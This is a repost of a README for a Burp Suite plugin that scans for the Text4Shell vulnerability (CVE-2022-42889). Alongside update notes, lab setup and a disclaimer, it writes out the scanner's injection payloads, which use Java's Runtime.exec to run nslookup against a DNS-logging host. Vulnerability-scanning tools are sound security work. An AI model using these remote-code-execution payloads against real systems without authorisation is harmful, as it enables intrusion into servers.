項目地址:https://github.com/A0WaQ4/BurpText4ShellScan
簡介使用java編寫的Text4shell burp被動掃描插件
java maven項目,可以使用mvn package進行編譯
更新
1.0 - 首次上傳,對所有經過burp的包進行被動掃描,掃描對象包括了json、xml、fileupload
1.1 - 修復了body為空時導致的檢測錯誤,修復了對URL參數不檢測的錯誤
1.2 - 修復了body僅有json與xml時出現的參數構造錯誤,修復了dns二次檢測時未獲取key導致的錯誤
1.3 - 添加了主動掃描功能
1.4 - 添加了header黑名單功能,可以在resources/config.yml中修改
payload
- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"
可以在resources/config.yml修改
使用
1. 搭建環境
使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建環境

2.插件
代理訪問http://yourip:80/text4shell/attack?search=aaa,開始掃描
在logger中可看見插件發送的包

僅對是否可以dnslog進行掃描,若dnslog接受到請求,則爆出漏洞


3. 配置
在resources/config.yml中的dnsLogModule修改dnslog配置,使用時可以修改為自搭建的DnsLog服務器

免責聲明
該工具僅用于安全自查檢測,由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
服務器
+關注
關注
14文章
10251瀏覽量
91480 -
JAVA
+關注
關注
20文章
3001瀏覽量
116422 -
GitHub
+關注
關注
3文章
488瀏覽量
18662
原文標題:Text4Shell的burp被動掃描插件
文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
熱點推薦
shell是什么?shell實現原理分析基于MM32 MCU的shell腳本源碼
在前兩節中,我們講解了如何在MM32 MCU上使用shell來輔助開發,分別介紹的是通過串口方式和J-Link RTT方式的shell,本次課程我們分析源碼來講解shell實現原理。 軟件資源如下
發表于 12-02 15:58
?3020次閱讀
了解鴻蒙OS Text組件
文本(Text)是用來顯示字符串的組件,在界面上顯示為一塊文本區域。Text 作為一個基本組件,有很多擴展,常見的有按鈕組件 Button,文本編輯組件 TextField。 使用 Text 創建
shell編程之shell是什么
reminder that the file contains special text called a shell script.chmod 0755 myfile.sh
發表于 11-26 16:00
Linux Shell系列教程之Shell while循環及特點
循環處理時,COUNTER加1,直到COUNT為5后終止。 輸出: 1 2 3 4 5 例子2: #!/bin/bash while read text do echo
發表于 09-04 15:21
在RN4020,中央或觀察員角色執行主動掃描還是被動掃描?
在RN4020,中央或觀察員角色執行“主動”掃描還是“被動掃描”?也就是說,RN4020在掃描時發送,還是只接收廣播/廣告?我讀過一些BLE模塊發送
發表于 05-07 08:21
免安裝代碼編輯器Sublime Text3已經安裝好各種功能插件應用程序
本文檔的主要內容詳細介紹的是免安裝代碼編輯器Sublime Text3已經安裝好各種功能插件應用程序免費下載。
發表于 03-27 08:00
?29次下載
Linux中shell腳本執的4種方式
Linux中shell腳本的執行通常有4種方式,分別為工作目錄執行,絕對路徑執行,sh執行,shell環境執行。
發表于 05-23 09:28
?1163次閱讀
FOFA聯動XRAY小工具:XRAY-F
代理到Burp然后Burp再代理到Xray這樣既可以聯動Burp的插件如Shiro,FastJson插件也可以使用
shell腳本基礎知識匯總4
Shell 編程跟 JavaScript、php 編程一樣,只要有一個能編寫代碼的文本編輯器和一個能解釋執行的腳本解釋器就可以了。
Linux 的 Shell 種類眾多,常見的有:
BurpSuite多功能輔助插件配置介紹
介紹 knife是一個BurpSuite插件,主要目的是對Burp做一些小的改進,讓使用更方便。就像用一把小刀對Burp進行小小的雕刻,故名“knife”。 注意事項 使用插件前,請先
Text4Shell的burp被動掃描插件
評論